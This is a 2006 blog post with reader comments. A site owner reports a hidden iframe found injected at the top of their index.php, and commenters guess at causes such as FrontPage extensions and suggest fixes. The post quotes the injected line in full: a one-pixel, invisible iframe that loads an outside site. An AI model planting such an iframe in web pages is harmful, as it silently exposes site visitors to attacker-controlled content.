Who is trustdotcom?
I'm not sure if my site has been hacked or if my host Take This Host has been screwing with my site, but today the following HTML code appeared at the very beginning of my index.php file:
<iframe width=1 height=1 border=0 frameborder=0 xsrc='http://trustdotcom.com/nnews/index.php' style='display:none;'></iframe>
It only came to my attention because PHP was throwing up a warning because header information had already been sent.
I Googled "trustdotcom" and other variations but found no mention of it. I also tried accessing the URL in the HTML and the root domain path but it said my IP was blocked.
If anyone can enlighten me on where this may have come from, please leave a comment. I'd ask Take This Host but I have have support requests logged with them from many many months ago that have never received a reply. So I wouldn't expect any help with this.
UPDATE: Thanks for everyone's comments. Especially Gary W who took the time to post a link to aboutmynews.org iframe injection in another blog post when he noticed I had yet another iframe injection in my site I didn't see myself. I've disabled frontpage extensions and now I've changed hosts I'll be reporting any further injections. I'll also be scanning for spyware as suggested and I thought I would add some CSS to make the iframe visible for if it appears again.
Filed In:
Comments
2. Megan says…
Most likely your webhost doesnt know what what's causing it. No one does. Last month is was the same thing but with aboutmynews.org as the iframe target. Until that site was shut down. My guess is it's injected to world writeable index files. Search for the aboutmynews.org/news/InF.php issue and you'll find a little more information, but not much.
Posted on Sun 31 Dec, 2006
3. Ho says…
Do you have FrontPage extensions installed on your account? It looks like that's how they get in.
Posted on Thu 4 Jan, 2007
4. Vicki says…
Had the same problem with my site...and yes I have FrontPage extensions installed on the account. The iframe only appeared on the index page. I have since deleted it. How does it get there?
Posted on Thu 11 Jan, 2007
5. Andy says…
I dunno how they get there - happened twice on a client's site. Chmod the index file to 444. That seems to solve the problem...
Posted on Tue 30 Jan, 2007
6. Laverne Hill says…
Get your ad off my webpage now. How dare you.....
Laverne Hill
Posted on Wed 9 Jan, 2008
Rules: Paragraphs and linebreaks are automatically created (two or more linebreaks create a paragraph). Linebreaks between code tags remain linebreaks. Block tags cannot be enclosed by inline tags. Red attributes are required and green is optional.
Use "<" and ">" for "<" and ">". Enclosing PHP code in <code> tags will highlight the code (i.e. <code><?php echo 'hello world'; ?></code>).
List of valid tags:
<blockquote title="" cite=""></blockquote><cite cite="" title=""></cite><a href="" title=""></a><strong title=""></strong><em title=""></em><code title=""></code><abbr title=""></abbr><acronym title=""></acronym><ol title=""></ol><ul title=""></ul><li title=""></li>
1. Craig says…
I did a whois search for trusdotcom.com and came up with : clicky. There is a referral URL on that page for clicky again which appears to be for a site 'wholesale domain registration and internet services'. Here is the whois result for onlinenic whois onlinenic
Not sure why it would appear in your web code though. Should probably take it up with your hosting mob.
Posted on Sat 30 Dec, 2006